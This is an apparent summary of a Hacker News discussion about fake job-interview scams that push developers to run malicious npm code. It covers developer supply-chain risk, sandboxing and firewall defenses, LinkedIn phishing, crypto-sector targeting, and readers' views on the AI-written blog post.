I almost got hacked by a 'job interview'

Original Article ↗ Hacker News Discussion ↗

Attack pattern: fake job interviews delivering malware

  • Many commenters report nearly identical scams: unsolicited “interviews” (especially for blockchain/web3 roles), followed by a request to clone a private repo (often Bitbucket/Gitea/GitLab) and run npm/Node code that turns out to be a backdoor or wallet stealer.
  • Some link these campaigns to known North Korean groups; others had code later analyzed and traced to DPRK infrastructure.
  • The original story’s target company and “Chief Blockchain Officer” may be real, impersonated, or completely fabricated; attempts to contact them went unanswered and some LinkedIn profiles were later removed.

Developer supply-chain risk and untrusted code

  • The incident is used as a cautionary example of how normalized it is for developers to git clone/npm install unknown code (including interview tasks, npm deps, GitHub snippets), making this vector “perfect for developers.”
  • Several note that auditing large dependency trees is effectively impossible; risk must be managed (minimal deps, careful vetting, version locking), not eliminated.
  • Others argue the only robust stance is to assume any dependency or build tool may be compromised and design for isolation and least authority.

Sandboxing, tooling, and practical defenses

  • Strong support for always running untrusted code in isolated environments: VMs (KVM, Proxmox, Qubes, EC2), devcontainers, or dedicated machines.
  • Debate over Docker: convenient and helpful but “not a sandbox” in the strong sense; some recommend incus, gVisor, or full VMs instead.
  • Outbound firewalls like Little Snitch/OpenSnitch, Malwarebytes WFC, and tools like LavaMoat, kipuka, sandbox-venv/sandbox-run are recommended to constrain network and runtime privileges.
  • Several advocate separate user accounts or devices for sensitive tasks (banking, wallets).

LinkedIn and identity verification concerns

  • LinkedIn is seen as a prime phishing/spear‑phishing channel with many fake or freshly created profiles, sometimes even “verified” via third-party services.
  • Heuristics suggested: account age, job-verification badges, and skepticism toward vague “opportunities” and opaque roles.
  • Some users report scam approaches tied to HN “Who wants to be hired” and Upwork, often escalating to remote-control or account‑rental requests.

Crypto/blockchain as high‑risk target space

  • Many call any “blockchain real estate” or web3 pitch a red flag, arguing the sector is saturated with scams and attracts victims with wallets on dev machines.
  • Others note that, despite dubious business value, there are real, well‑funded crypto companies—making this a fertile hunting ground for attackers.

Debate over AI’s role and the AI‑written article

  • Commenters disagree on whether AI “saved” the author: some credit human suspicion and luck, with the model acting as a fancy pattern spotter; others see AI-assisted review as genuinely useful.
  • Many strongly dislike the blog’s LLM‑generated style, finding it generic, verbose, and trust‑diluting; after the author shared the original draft, multiple readers preferred the unpolished human version.
  • Broader worries emerge that widespread AI‑mediated writing erodes individual voice, authenticity, and reader confidence, even when the underlying story is true.